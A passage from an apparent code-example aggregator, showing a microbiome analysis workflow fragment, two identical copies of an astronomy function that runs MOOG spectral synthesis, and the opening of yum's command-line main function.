                if not exists(compare_alpha_output_dir):
                    compare_alpha_cmd = \
                        'compare_alpha_diversity.py -i %s -m %s -c %s -o %s -n 999 %s' %\
                        (collated_alpha_diversity_fp,
                         mapping_fp,
                         comma_separated_categories,
                         compare_alpha_output_dir,
                         params_str)
                    commands.append(
                        [('Compare alpha diversity (%s)' % alpha_metric,
                          compare_alpha_cmd)])
                    for category in categories:
                        alpha_comparison_stat_fp = '%s/%s_stats.txt' % \
                            (compare_alpha_output_dir, category)
                        alpha_comparison_boxplot_fp = '%s/%s_boxplots.pdf' % \
                            (compare_alpha_output_dir, category)
                        index_links.append(
                            ('Alpha diversity statistics (%s, %s)' % (category, alpha_metric),
                             alpha_comparison_stat_fp,
                             _index_headers['alpha_diversity']))
                        index_links.append(
                            ('Alpha diversity boxplots (%s, %s)' % (category, alpha_metric),
                             alpha_comparison_boxplot_fp,
                             _index_headers['alpha_diversity']))
                else:
                    logger.write("Skipping compare_alpha_diversity.py"
                                 " for %s as %s exists.\n\n"
                                 % (alpha_metric, compare_alpha_output_dir))
        else:
            logger.write("Skipping compare_alpha_diversity.py as"
                         " no categories were provided.\n\n")

    if not suppress_taxa_summary:
        taxa_plots_output_dir = '%s/taxa_plots/' % output_dir
        # need to check for existence of any html files, since the user can
        # select only certain ones to be generated
        existing_taxa_plot_html_fps = glob(join(taxa_plots_output_dir,
                                                'taxa_summary_plots', '*.html'))
        if len(existing_taxa_plot_html_fps) == 0:
            run_summarize_taxa_through_plots(
                otu_table_fp=biom_fp,
                mapping_fp=mapping_fp,
                output_dir=taxa_plots_output_dir,
                mapping_cat=None,
                sort=True,
                command_handler=command_handler,
                params=params,
                qiime_config=qiime_config,
                logger=logger,
                suppress_md5=True,
                status_update_callback=status_update_callback)
        else:
            logger.write("Skipping summarize_taxa_through_plots.py for as %s exist(s).\n\n"
                         % ', '.join(existing_taxa_plot_html_fps))

        index_links.append(('Taxa summary bar plots',
                            '%s/taxa_summary_plots/bar_charts.html'
                            % taxa_plots_output_dir,
                            _index_headers['taxa_summary']))
        index_links.append(('Taxa summary area plots',
                            '%s/taxa_summary_plots/area_charts.html'
                            % taxa_plots_output_dir,
                            _index_headers['taxa_summary']))
        for category in categories:
            taxa_plots_output_dir = '%s/taxa_plots_%s/' % (output_dir,
                                                           category)
            # need to check for existence of any html files, since the user can
            # select only certain ones to be generated
            existing_taxa_plot_html_fps = glob(
                '%s/taxa_summary_plots/*.html' %
                taxa_plots_output_dir)
            if len(existing_taxa_plot_html_fps) == 0:
                run_summarize_taxa_through_plots(
                    otu_table_fp=biom_fp,
                    mapping_fp=mapping_fp,
                    output_dir=taxa_plots_output_dir,
                    mapping_cat=category,
                    sort=True,
                    command_handler=command_handler,
                    params=params,
                    qiime_config=qiime_config,
                    logger=logger,
                    suppress_md5=True,
                    status_update_callback=status_update_callback)
            else:
                logger.write("Skipping summarize_taxa_through_plots.py for %s as %s exist(s).\n\n"
                             % (category, ', '.join(existing_taxa_plot_html_fps)))

            index_links.append(('Taxa summary bar plots',
                                '%s/taxa_summary_plots/bar_charts.html'
                                % taxa_plots_output_dir,
                                _index_headers['taxa_summary_categorical'] % category))
            index_links.append(('Taxa summary area plots',
                                '%s/taxa_summary_plots/area_charts.html'
                                % taxa_plots_output_dir,
                                _index_headers['taxa_summary_categorical'] % category))

    if not suppress_group_significance:
        params_str = get_params_str(params['group_significance'])
        # group significance tests, aka category significance
        for category in categories:
            group_signifance_fp = \
                '%s/group_significance_%s.txt' % (output_dir, category)
            if not exists(group_signifance_fp):
                # Build the OTU cateogry significance command
                group_significance_cmd = \
                    'group_significance.py -i %s -m %s -c %s -o %s %s' %\
                    (rarefied_biom_fp, mapping_fp, category,
                     group_signifance_fp, params_str)
                commands.append([('Group significance (%s)' % category,
                                  group_significance_cmd)])
            else:
                logger.write("Skipping group_significance.py for %s as %s exists.\n\n"
                             % (category, group_signifance_fp))

            index_links.append(('Category significance (%s)' % category,
                                group_signifance_fp,
                                _index_headers['group_significance']))

    filtered_biom_gzip_fp = '%s.gz' % filtered_biom_fp
    if not exists(filtered_biom_gzip_fp):
        commands.append(
            [('Compress the filtered BIOM table', 'gzip %s' %
              filtered_biom_fp)])
    else:
        logger.write("Skipping compressing of filtered BIOM table as %s exists.\n\n"
                     % filtered_biom_gzip_fp)
    index_links.append(
        ('Filtered BIOM table (minimum sequence count: %d)' % sampling_depth,
         filtered_biom_gzip_fp,
         _index_headers['run_summary']))

    rarefied_biom_gzip_fp = '%s.gz' % rarefied_biom_fp
    if not exists(rarefied_biom_gzip_fp):
        commands.append(
            [('Compress the rarefied BIOM table', 'gzip %s' %
              rarefied_biom_fp)])
    else:
        logger.write("Skipping compressing of rarefied BIOM table as %s exists.\n\n"
                     % rarefied_biom_gzip_fp)
    index_links.append(
        ('rarefied BIOM table (sampling depth: %d)' % sampling_depth,
         rarefied_biom_gzip_fp,
         _index_headers['run_summary']))

    if len(commands) > 0:
        command_handler(commands, status_update_callback, logger)
    else:
        logger.close()

    generate_index_page(index_links, index_fp)

Example 142

Project: apogee
Source File: moog.py
View license
def moogsynth(*args,**kwargs):
    """
    NAME:
       moogsynth
    PURPOSE:
       Run a MOOG synthesis (direct interface to the MOOG code; use 'synth' for a general routine that generates the non-continuum-normalized spectrum, convolves withe LSF and macrotubulence, and optionally continuum normalizes the output)
    INPUT ARGUMENTS:
       lists with abundances (they don't all have to have the same length, missing ones are filled in with zeros):
          [Atomic number1,diff1_1,diff1_2,diff1_3,...,diff1_N]
          [Atomic number2,diff2_1,diff2_2,diff2_3,...,diff2_N]
          ...
          [Atomic numberM,diffM_1,diffM_2,diffM_3,...,diffM_N]
    SYNTHEIS KEYWORDS:
       isotopes= ('solar') use 'solar' or 'arcturus' isotope ratios; can also be a dictionary with isotope ratios (e.g., isotopes= {'108.00116':'1.001','606.01212':'1.01'})
       wmin, wmax, dw, width= (15000.000, 17000.000, 0.10000000, 7.0000000) spectral synthesis limits, step, and width of calculation (see MOOG)
       doflux= (False) if True, calculate the continuum flux instead
    LINELIST KEYWORDS:
       linelist= (None) linelist to use; if this is None, the code looks for a weed-out version of the linelist appropriate for the given model atmosphere; otherwise can be set to the path of a linelist file or to the name of an APOGEE linelist
    ATMOSPHERE KEYWORDS:
       Either:
          (a) modelatm= (None) can be set to the filename of a model atmosphere (needs to end in .mod)
          (b) specify the stellar parameters for a grid point in model atm by
              - lib= ('kurucz_filled') spectral library
              - teff= (4500) grid-point Teff
              - logg= (2.5) grid-point logg
              - metals= (0.) grid-point metallicity
              - cm= (0.) grid-point carbon-enhancement
              - am= (0.) grid-point alpha-enhancement
              - dr= return the path corresponding to this data release
       vmicro= (2.) microturbulence (km/s) (only used if the MOOG-formatted atmosphere file doesn't already exist)
    OUTPUT:
       (wavelengths,spectra (nspec,nwave)) for synth driver
       (wavelengths,continuum spectr (nwave)) for doflux driver     
    HISTORY:
       2015-02-13 - Written - Bovy (IAS)
    """
    doflux= kwargs.pop('doflux',False)
    # Get the spectral synthesis limits
    wmin= kwargs.pop('wmin',_WMIN_DEFAULT)
    wmax= kwargs.pop('wmax',_WMAX_DEFAULT)
    dw= kwargs.pop('dw',_DW_DEFAULT)
    width= kwargs.pop('width',_WIDTH_DEFAULT)
    linelist= kwargs.pop('linelist',None)
    # Parse isotopes
    isotopes= kwargs.pop('isotopes','solar')
    if isinstance(isotopes,str) and isotopes.lower() == 'solar':
        isotopes= {'108.00116':'1.001',
                   '606.01212':'1.01',
                   '606.01213':'90',
                   '606.01313':'180',
                   '607.01214':'1.01',
                   '607.01314':'90',
                   '607.01215':'273',
                   '608.01216':'1.01',
                   '608.01316':'90',
                   '608.01217':'1101',
                   '608.01218':'551',
                   '114.00128':'1.011',
                   '114.00129':'20',
                   '114.00130':'30',
                   '101.00101':'1.001',
                   '101.00102':'1000',
                   '126.00156':'1.00'}
    elif isinstance(isotopes,str) and isotopes.lower() == 'arcturus':
        isotopes= {'108.00116':'1.001',
                   '606.01212':'0.91',
                   '606.01213':'8',
                   '606.01313':'81',
                   '607.01214':'0.91',
                   '607.01314':'8',
                   '607.01215':'273',
                   '608.01216':'0.91',
                   '608.01316':'8',
                   '608.01217':'1101',
                   '608.01218':'551',
                   '114.00128':'1.011',
                   '114.00129':'20',
                   '114.00130':'30',
                   '101.00101':'1.001',
                   '101.00102':'1000',
                   '126.00156':'1.00'}
    elif not isinstance(isotopes,dict):
        raise ValueError("'isotopes=' input not understood, should be 'solar', 'arcturus', or a dictionary")
    # Get the filename of the model atmosphere
    modelatm= kwargs.pop('modelatm',None)
    if not modelatm is None:
        if isinstance(modelatm,str) and os.path.exists(modelatm):
            modelfilename= modelatm
        elif isinstance(modelatm,str):
            raise ValueError('modelatm= input is a non-existing filename')
        else:
            raise ValueError('modelatm= in moogsynth should be set to the name of a file')
    else:
        modelfilename= appath.modelAtmospherePath(**kwargs)
    # Check whether a MOOG version exists
    if not os.path.exists(modelfilename.replace('.mod','.org')):
        # Convert to MOOG format
        convert_modelAtmosphere(modelatm=modelfilename,**kwargs)
    modeldirname= os.path.dirname(modelfilename)
    modelbasename= os.path.basename(modelfilename)
    # Get the name of the linelist
    if linelist is None:
        linelistfilename= modelbasename.replace('.mod','.lines')
        if not os.path.exists(os.path.join(modeldirname,linelistfilename)):
            raise IOError('No linelist given and no weed-out version found for this atmosphere; either specify a linelist or run weedout first')
        linelistfilename= os.path.join(modeldirname,linelistfilename)
    elif os.path.exists(linelist):
        linelistfilename= linelist
    else:
        linelistfilename= appath.linelistPath(linelist,
                                              dr=kwargs.get('dr',None))
    if not os.path.exists(linelistfilename):
        raise RuntimeError("Linelist %s not found; download linelist w/ apogee.tools.download.linelist (if you have access)" % linelistfilename)
    # We will run in a subdirectory of the relevant model atmosphere
    tmpDir= tempfile.mkdtemp(dir=modeldirname)
    shutil.copy(linelistfilename,tmpDir)
    # Cut the linelist to the desired wavelength range
    with open(os.path.join(tmpDir,'cutlines.awk'),'w') as awkfile:
        awkfile.write('$1>%.3f && $1<%.3f\n' %(wmin-width,wmax+width))
    keeplines= open(os.path.join(tmpDir,'lines.tmp'),'w')
    stderr= open('/dev/null','w')
    try:
        subprocess.check_call(['awk','-f','cutlines.awk',
                               os.path.basename(linelistfilename)],
                              cwd=tmpDir,stdout=keeplines,stderr=stderr)
        keeplines.close()
        shutil.copy(os.path.join(tmpDir,'lines.tmp'),
                    os.path.join(tmpDir,os.path.basename(linelistfilename)))
    except subprocess.CalledProcessError:
        print("Removing unnecessary linelist entries failed ...")
    finally:
        os.remove(os.path.join(tmpDir,'cutlines.awk'))
        os.remove(os.path.join(tmpDir,'lines.tmp'))
        stderr.close()
    # Also copy the strong lines
    stronglinesfilename= appath.linelistPath('stronglines.vac',
                                             dr=kwargs.get('dr',None))
    if not os.path.exists(stronglinesfilename):
        try:
            download.linelist('stronglines.vac',dr=kwargs.get('dr',None))
        except:
            raise RuntimeError("Linelist stronglines.vac not found or downloading failed; download linelist w/ apogee.tools.download.linelist (if you have access)")
        finally:
            if os.path.exists(os.path.join(tmpDir,'synth.par')):
                os.remove(os.path.join(tmpDir,'synth.par'))
            if os.path.exists(os.path.join(tmpDir,'std.out')):
                os.remove(os.path.join(tmpDir,'std.out'))
            if os.path.exists(os.path.join(tmpDir,
                                           os.path.basename(linelistfilename))):
                os.remove(os.path.join(tmpDir,os.path.basename(linelistfilename)))
            if os.path.exists(os.path.join(tmpDir,'stronglines.vac')):
                os.remove(os.path.join(tmpDir,'stronglines.vac'))
            os.rmdir(tmpDir)
    shutil.copy(stronglinesfilename,tmpDir)
    # Now write the script file
    if len(args) == 0: #special case that there are *no* differences
        args= ([26,0.],)
    nsynths= numpy.array([len(args[ii])-1 for ii in range(len(args))])
    nsynth= numpy.amax(nsynths) #Take the longest abundance list
    if nsynth > 5:
        raise ValueError("MOOG only allows five syntheses to be run at the same time; please reduce the number of abundance values in the apogee.modelspec.moog.moogsynth input")
    nabu= len(args)
    with open(os.path.join(tmpDir,'synth.par'),'w') as parfile:
        if doflux:
            parfile.write('doflux\n')
        else:
            parfile.write('synth\n')
        parfile.write('terminal x11\n')
        parfile.write('plot 1\n')
        parfile.write("standard_out std.out\n")
        parfile.write("summary_out '../synth.out'\n")
        parfile.write("smoothed_out '/dev/null'\n")
        parfile.write("strong 1\n")
        parfile.write("damping 0\n")
        parfile.write("stronglines_in stronglines.vac\n")
        parfile.write("model_in '../%s'\n" % modelbasename.replace('.mod','.org'))
        parfile.write("lines_in %s\n" % os.path.basename(linelistfilename))
        parfile.write("atmosphere 1\n")
        parfile.write("molecules 2\n")
        parfile.write("lines 1\n")
        parfile.write("flux/int 0\n")
        # Write the isotopes
        niso= len(isotopes)
        parfile.write("isotopes %i %i\n" % (niso,nsynth))
        for iso in isotopes:
            isotopestr= iso
            for ii in range(nsynth):
                isotopestr+= ' '+isotopes[iso]
            parfile.write(isotopestr+'\n')
        # Abundances
        parfile.write("abundances %i %i\n" % (nabu,nsynth))
        for ii in range(nabu):
            abustr= '%i' % args[ii][0]
            for jj in range(nsynth):
                try:
                    abustr+= ' %.3f' % args[ii][jj+1]
                except IndexError:
                    abustr+= ' 0.0'
            parfile.write(abustr+"\n")
        # Synthesis limits
        parfile.write("synlimits\n") # Add 0.001 to make sure wmax is included
        parfile.write("%.3f  %.3f  %.3f  %.3f\n" % (wmin,wmax+0.001,dw,width))
    # Now run synth
    sys.stdout.write('\r'+"Running MOOG synth ...\r")
    sys.stdout.flush()
    try:
        p= subprocess.Popen(['moogsilent'],
                            cwd=tmpDir,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
        p.stdin.write(b'synth.par\n')
        stdout, stderr= p.communicate()
    except subprocess.CalledProcessError:
        print("Running synth failed ...")
    finally:
        if os.path.exists(os.path.join(tmpDir,'synth.par')):
            os.remove(os.path.join(tmpDir,'synth.par'))
        if os.path.exists(os.path.join(tmpDir,'std.out')):
            os.remove(os.path.join(tmpDir,'std.out'))
        if os.path.exists(os.path.join(tmpDir,
                                       os.path.basename(linelistfilename))):
            os.remove(os.path.join(tmpDir,os.path.basename(linelistfilename)))
        if os.path.exists(os.path.join(tmpDir,'stronglines.vac')):
            os.remove(os.path.join(tmpDir,'stronglines.vac'))
        os.rmdir(tmpDir)
        sys.stdout.write('\r'+download._ERASESTR+'\r')
        sys.stdout.flush()        
    # Now read the output
    wavs= numpy.arange(wmin,wmax+dw,dw)
    if wavs[-1] > wmax+dw/2.: wavs= wavs[:-1]
    if doflux:
        contdata= numpy.loadtxt(os.path.join(modeldirname,'synth.out'),
                                converters={0:lambda x: x.replace('D','E'),
                                            1:lambda x: x.replace('D','E')},
                                usecols=[0,1])
        # Wavelength in summary file appears to be wrong from comparing to 
        # the standard output file
        out= contdata[:,1]
        out/= numpy.nanmean(out) # Make the numbers more manageable
    else:
        with open(os.path.join(modeldirname,'synth.out')) as summfile:
            out= numpy.empty((nsynth,len(wavs)))
            for ii in range(nsynth):
                # Skip to beginning of synthetic spectrum
                while True:
                    line= summfile.readline()
                    if line[0] == 'M': break
                summfile.readline()
                tout= []
                while True:
                    line= summfile.readline()
                    if not line or line[0] == 'A': break
                    tout.extend([float(s) for s in line.split()])
                out[ii]= numpy.array(tout)
    os.remove(os.path.join(modeldirname,'synth.out'))
    if doflux:
        return (wavs,out)
    else:
        return (wavs,1.-out)

Example 143

Project: apogee
Source File: moog.py
View license
def moogsynth(*args,**kwargs):
    """
    NAME:
       moogsynth
    PURPOSE:
       Run a MOOG synthesis (direct interface to the MOOG code; use 'synth' for a general routine that generates the non-continuum-normalized spectrum, convolves withe LSF and macrotubulence, and optionally continuum normalizes the output)
    INPUT ARGUMENTS:
       lists with abundances (they don't all have to have the same length, missing ones are filled in with zeros):
          [Atomic number1,diff1_1,diff1_2,diff1_3,...,diff1_N]
          [Atomic number2,diff2_1,diff2_2,diff2_3,...,diff2_N]
          ...
          [Atomic numberM,diffM_1,diffM_2,diffM_3,...,diffM_N]
    SYNTHEIS KEYWORDS:
       isotopes= ('solar') use 'solar' or 'arcturus' isotope ratios; can also be a dictionary with isotope ratios (e.g., isotopes= {'108.00116':'1.001','606.01212':'1.01'})
       wmin, wmax, dw, width= (15000.000, 17000.000, 0.10000000, 7.0000000) spectral synthesis limits, step, and width of calculation (see MOOG)
       doflux= (False) if True, calculate the continuum flux instead
    LINELIST KEYWORDS:
       linelist= (None) linelist to use; if this is None, the code looks for a weed-out version of the linelist appropriate for the given model atmosphere; otherwise can be set to the path of a linelist file or to the name of an APOGEE linelist
    ATMOSPHERE KEYWORDS:
       Either:
          (a) modelatm= (None) can be set to the filename of a model atmosphere (needs to end in .mod)
          (b) specify the stellar parameters for a grid point in model atm by
              - lib= ('kurucz_filled') spectral library
              - teff= (4500) grid-point Teff
              - logg= (2.5) grid-point logg
              - metals= (0.) grid-point metallicity
              - cm= (0.) grid-point carbon-enhancement
              - am= (0.) grid-point alpha-enhancement
              - dr= return the path corresponding to this data release
       vmicro= (2.) microturbulence (km/s) (only used if the MOOG-formatted atmosphere file doesn't already exist)
    OUTPUT:
       (wavelengths,spectra (nspec,nwave)) for synth driver
       (wavelengths,continuum spectr (nwave)) for doflux driver     
    HISTORY:
       2015-02-13 - Written - Bovy (IAS)
    """
    doflux= kwargs.pop('doflux',False)
    # Get the spectral synthesis limits
    wmin= kwargs.pop('wmin',_WMIN_DEFAULT)
    wmax= kwargs.pop('wmax',_WMAX_DEFAULT)
    dw= kwargs.pop('dw',_DW_DEFAULT)
    width= kwargs.pop('width',_WIDTH_DEFAULT)
    linelist= kwargs.pop('linelist',None)
    # Parse isotopes
    isotopes= kwargs.pop('isotopes','solar')
    if isinstance(isotopes,str) and isotopes.lower() == 'solar':
        isotopes= {'108.00116':'1.001',
                   '606.01212':'1.01',
                   '606.01213':'90',
                   '606.01313':'180',
                   '607.01214':'1.01',
                   '607.01314':'90',
                   '607.01215':'273',
                   '608.01216':'1.01',
                   '608.01316':'90',
                   '608.01217':'1101',
                   '608.01218':'551',
                   '114.00128':'1.011',
                   '114.00129':'20',
                   '114.00130':'30',
                   '101.00101':'1.001',
                   '101.00102':'1000',
                   '126.00156':'1.00'}
    elif isinstance(isotopes,str) and isotopes.lower() == 'arcturus':
        isotopes= {'108.00116':'1.001',
                   '606.01212':'0.91',
                   '606.01213':'8',
                   '606.01313':'81',
                   '607.01214':'0.91',
                   '607.01314':'8',
                   '607.01215':'273',
                   '608.01216':'0.91',
                   '608.01316':'8',
                   '608.01217':'1101',
                   '608.01218':'551',
                   '114.00128':'1.011',
                   '114.00129':'20',
                   '114.00130':'30',
                   '101.00101':'1.001',
                   '101.00102':'1000',
                   '126.00156':'1.00'}
    elif not isinstance(isotopes,dict):
        raise ValueError("'isotopes=' input not understood, should be 'solar', 'arcturus', or a dictionary")
    # Get the filename of the model atmosphere
    modelatm= kwargs.pop('modelatm',None)
    if not modelatm is None:
        if isinstance(modelatm,str) and os.path.exists(modelatm):
            modelfilename= modelatm
        elif isinstance(modelatm,str):
            raise ValueError('modelatm= input is a non-existing filename')
        else:
            raise ValueError('modelatm= in moogsynth should be set to the name of a file')
    else:
        modelfilename= appath.modelAtmospherePath(**kwargs)
    # Check whether a MOOG version exists
    if not os.path.exists(modelfilename.replace('.mod','.org')):
        # Convert to MOOG format
        convert_modelAtmosphere(modelatm=modelfilename,**kwargs)
    modeldirname= os.path.dirname(modelfilename)
    modelbasename= os.path.basename(modelfilename)
    # Get the name of the linelist
    if linelist is None:
        linelistfilename= modelbasename.replace('.mod','.lines')
        if not os.path.exists(os.path.join(modeldirname,linelistfilename)):
            raise IOError('No linelist given and no weed-out version found for this atmosphere; either specify a linelist or run weedout first')
        linelistfilename= os.path.join(modeldirname,linelistfilename)
    elif os.path.exists(linelist):
        linelistfilename= linelist
    else:
        linelistfilename= appath.linelistPath(linelist,
                                              dr=kwargs.get('dr',None))
    if not os.path.exists(linelistfilename):
        raise RuntimeError("Linelist %s not found; download linelist w/ apogee.tools.download.linelist (if you have access)" % linelistfilename)
    # We will run in a subdirectory of the relevant model atmosphere
    tmpDir= tempfile.mkdtemp(dir=modeldirname)
    shutil.copy(linelistfilename,tmpDir)
    # Cut the linelist to the desired wavelength range
    with open(os.path.join(tmpDir,'cutlines.awk'),'w') as awkfile:
        awkfile.write('$1>%.3f && $1<%.3f\n' %(wmin-width,wmax+width))
    keeplines= open(os.path.join(tmpDir,'lines.tmp'),'w')
    stderr= open('/dev/null','w')
    try:
        subprocess.check_call(['awk','-f','cutlines.awk',
                               os.path.basename(linelistfilename)],
                              cwd=tmpDir,stdout=keeplines,stderr=stderr)
        keeplines.close()
        shutil.copy(os.path.join(tmpDir,'lines.tmp'),
                    os.path.join(tmpDir,os.path.basename(linelistfilename)))
    except subprocess.CalledProcessError:
        print("Removing unnecessary linelist entries failed ...")
    finally:
        os.remove(os.path.join(tmpDir,'cutlines.awk'))
        os.remove(os.path.join(tmpDir,'lines.tmp'))
        stderr.close()
    # Also copy the strong lines
    stronglinesfilename= appath.linelistPath('stronglines.vac',
                                             dr=kwargs.get('dr',None))
    if not os.path.exists(stronglinesfilename):
        try:
            download.linelist('stronglines.vac',dr=kwargs.get('dr',None))
        except:
            raise RuntimeError("Linelist stronglines.vac not found or downloading failed; download linelist w/ apogee.tools.download.linelist (if you have access)")
        finally:
            if os.path.exists(os.path.join(tmpDir,'synth.par')):
                os.remove(os.path.join(tmpDir,'synth.par'))
            if os.path.exists(os.path.join(tmpDir,'std.out')):
                os.remove(os.path.join(tmpDir,'std.out'))
            if os.path.exists(os.path.join(tmpDir,
                                           os.path.basename(linelistfilename))):
                os.remove(os.path.join(tmpDir,os.path.basename(linelistfilename)))
            if os.path.exists(os.path.join(tmpDir,'stronglines.vac')):
                os.remove(os.path.join(tmpDir,'stronglines.vac'))
            os.rmdir(tmpDir)
    shutil.copy(stronglinesfilename,tmpDir)
    # Now write the script file
    if len(args) == 0: #special case that there are *no* differences
        args= ([26,0.],)
    nsynths= numpy.array([len(args[ii])-1 for ii in range(len(args))])
    nsynth= numpy.amax(nsynths) #Take the longest abundance list
    if nsynth > 5:
        raise ValueError("MOOG only allows five syntheses to be run at the same time; please reduce the number of abundance values in the apogee.modelspec.moog.moogsynth input")
    nabu= len(args)
    with open(os.path.join(tmpDir,'synth.par'),'w') as parfile:
        if doflux:
            parfile.write('doflux\n')
        else:
            parfile.write('synth\n')
        parfile.write('terminal x11\n')
        parfile.write('plot 1\n')
        parfile.write("standard_out std.out\n")
        parfile.write("summary_out '../synth.out'\n")
        parfile.write("smoothed_out '/dev/null'\n")
        parfile.write("strong 1\n")
        parfile.write("damping 0\n")
        parfile.write("stronglines_in stronglines.vac\n")
        parfile.write("model_in '../%s'\n" % modelbasename.replace('.mod','.org'))
        parfile.write("lines_in %s\n" % os.path.basename(linelistfilename))
        parfile.write("atmosphere 1\n")
        parfile.write("molecules 2\n")
        parfile.write("lines 1\n")
        parfile.write("flux/int 0\n")
        # Write the isotopes
        niso= len(isotopes)
        parfile.write("isotopes %i %i\n" % (niso,nsynth))
        for iso in isotopes:
            isotopestr= iso
            for ii in range(nsynth):
                isotopestr+= ' '+isotopes[iso]
            parfile.write(isotopestr+'\n')
        # Abundances
        parfile.write("abundances %i %i\n" % (nabu,nsynth))
        for ii in range(nabu):
            abustr= '%i' % args[ii][0]
            for jj in range(nsynth):
                try:
                    abustr+= ' %.3f' % args[ii][jj+1]
                except IndexError:
                    abustr+= ' 0.0'
            parfile.write(abustr+"\n")
        # Synthesis limits
        parfile.write("synlimits\n") # Add 0.001 to make sure wmax is included
        parfile.write("%.3f  %.3f  %.3f  %.3f\n" % (wmin,wmax+0.001,dw,width))
    # Now run synth
    sys.stdout.write('\r'+"Running MOOG synth ...\r")
    sys.stdout.flush()
    try:
        p= subprocess.Popen(['moogsilent'],
                            cwd=tmpDir,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
        p.stdin.write(b'synth.par\n')
        stdout, stderr= p.communicate()
    except subprocess.CalledProcessError:
        print("Running synth failed ...")
    finally:
        if os.path.exists(os.path.join(tmpDir,'synth.par')):
            os.remove(os.path.join(tmpDir,'synth.par'))
        if os.path.exists(os.path.join(tmpDir,'std.out')):
            os.remove(os.path.join(tmpDir,'std.out'))
        if os.path.exists(os.path.join(tmpDir,
                                       os.path.basename(linelistfilename))):
            os.remove(os.path.join(tmpDir,os.path.basename(linelistfilename)))
        if os.path.exists(os.path.join(tmpDir,'stronglines.vac')):
            os.remove(os.path.join(tmpDir,'stronglines.vac'))
        os.rmdir(tmpDir)
        sys.stdout.write('\r'+download._ERASESTR+'\r')
        sys.stdout.flush()        
    # Now read the output
    wavs= numpy.arange(wmin,wmax+dw,dw)
    if wavs[-1] > wmax+dw/2.: wavs= wavs[:-1]
    if doflux:
        contdata= numpy.loadtxt(os.path.join(modeldirname,'synth.out'),
                                converters={0:lambda x: x.replace('D','E'),
                                            1:lambda x: x.replace('D','E')},
                                usecols=[0,1])
        # Wavelength in summary file appears to be wrong from comparing to 
        # the standard output file
        out= contdata[:,1]
        out/= numpy.nanmean(out) # Make the numbers more manageable
    else:
        with open(os.path.join(modeldirname,'synth.out')) as summfile:
            out= numpy.empty((nsynth,len(wavs)))
            for ii in range(nsynth):
                # Skip to beginning of synthetic spectrum
                while True:
                    line= summfile.readline()
                    if line[0] == 'M': break
                summfile.readline()
                tout= []
                while True:
                    line= summfile.readline()
                    if not line or line[0] == 'A': break
                    tout.extend([float(s) for s in line.split()])
                out[ii]= numpy.array(tout)
    os.remove(os.path.join(modeldirname,'synth.out'))
    if doflux:
        return (wavs,out)
    else:
        return (wavs,1.-out)

Example 144

Project: yum
Source File: yummain.py
View license
def main(args):
    """Run the yum program from a command line interface."""

    yum.misc.setup_locale(override_time=True)

    def exUserCancel():
        logger.critical(_('\n\nExiting on user cancel'))
        if unlock(): return 200
        return 1

    def exIOError(e):
        if e.errno == 32:
            logger.critical(_('\n\nExiting on Broken Pipe'))
        else:
            logger.critical(_('\n\n%s') % exception2msg(e))
        if unlock(): return 200
        return 1

    def exPluginExit(e):
        '''Called when a plugin raises PluginYumExit.

        Log the plugin's exit message if one was supplied.
        ''' # ' xemacs hack
        exitmsg = exception2msg(e)
        if exitmsg:
            logger.warn('\n\n%s', exitmsg)
        if unlock(): return 200
        return 1

    def exFatal(e):
        logger.critical('\n\n%s', exception2msg(e.value))
        if unlock(): return 200
        return 1

    def exRepoError(e):
        # For RepoErrors ... help out by forcing new repodata next time.
        # XXX: clean only the repo that has failed?
        base.cleanExpireCache()

        msg = _("""\
 One of the configured repositories failed (%(repo)s),
 and yum doesn't have enough cached data to continue. At this point the only
 safe thing yum can do is fail. There are a few ways to work "fix" this:

     1. Contact the upstream for the repository and get them to fix the problem.

     2. Reconfigure the baseurl/etc. for the repository, to point to a working
        upstream. This is most often useful if you are using a newer
        distribution release than is supported by the repository (and the
        packages for the previous distribution release still work).

     3. Run the command with the repository temporarily disabled
            yum --disablerepo=%(repoid)s ...

     4. Disable the repository permanently, so yum won't use it by default. Yum
        will then just ignore the repository until you permanently enable it
        again or use --enablerepo for temporary usage:

            yum-config-manager --disable %(repoid)s
        or
            subscription-manager repos --disable=%(repoid)s

     5. Configure the failing repository to be skipped, if it is unavailable.
        Note that yum will try to contact the repo. when it runs most commands,
        so will have to try and fail each time (and thus. yum will be be much
        slower). If it is a very temporary problem though, this is often a nice
        compromise:

            yum-config-manager --save --setopt=%(repoid)s.skip_if_unavailable=true
""")

        repoui = _('Unknown')
        repoid = _('<repoid>')
        try:
            repoid = e.repo.id
            repoui = e.repo.name
        except AttributeError:
            pass

        msg = msg % {'repoid' : repoid, 'repo' : repoui}

        logger.critical('\n\n%s\n%s', msg, exception2msg(e))

        if unlock(): return 200
        return 1

    def unlock():
        try:
            base.closeRpmDB()
            base.doUnlock()
        except Errors.LockError, e:
            return 200
        return 0

    def rpmdb_warn_checks():
        try:
            probs = base._rpmdb_warn_checks(out=verbose_logger.info, warn=False)
        except Errors.YumBaseError, e:
            # This is mainly for PackageSackError from rpmdb.
            verbose_logger.info(_(" Yum checks failed: %s"), exception2msg(e))
            probs = []
        if not probs:
            verbose_logger.info(_(" You could try running: rpm -Va --nofiles --nodigest"))

    logger = logging.getLogger("yum.main")
    verbose_logger = logging.getLogger("yum.verbose.main")

    # Try to open the current directory to see if we have 
    # read and execute access. If not, chdir to /
    try:
        f = open(".")
    except IOError, e:
        if e.errno == errno.EACCES:
            logger.critical(_('No read/execute access in current directory, moving to /'))
            os.chdir("/")
    else:
        f.close()
    try:
        os.getcwd()
    except OSError, e:
        if e.errno == errno.ENOENT:
            logger.critical(_('No getcwd() access in current directory, moving to /'))
            os.chdir("/")

    # our core object for the cli
    base = cli.YumBaseCli()

    # do our cli parsing and config file setup
    # also sanity check the things being passed on the cli
    try:
        base.getOptionsConfig(args)
    except plugins.PluginYumExit, e:
        return exPluginExit(e)
    except Errors.YumBaseError, e:
        return exFatal(e)
    except (OSError, IOError), e:
        return exIOError(e)

    try:
        base.waitForLock()
    except Errors.YumBaseError, e:
        return exFatal(e)

    try:
        result, resultmsgs = base.doCommands()
    except plugins.PluginYumExit, e:
        return exPluginExit(e)
    except Errors.RepoError, e:
        return exRepoError(e)
    except Errors.YumBaseError, e:
        result = 1
        resultmsgs = [exception2msg(e)]
    except KeyboardInterrupt:
        return exUserCancel()
    except IOError, e:
        return exIOError(e)

    # Act on the command/shell result
    if result == 0:
        # Normal exit 
        for msg in resultmsgs:
            verbose_logger.log(logginglevels.INFO_2, '%s', msg)
        if unlock(): return 200
        return base.exit_code
    elif result == 1:
        # Fatal error
        for msg in resultmsgs:
            logger.critical(_('Error: %s'), msg)
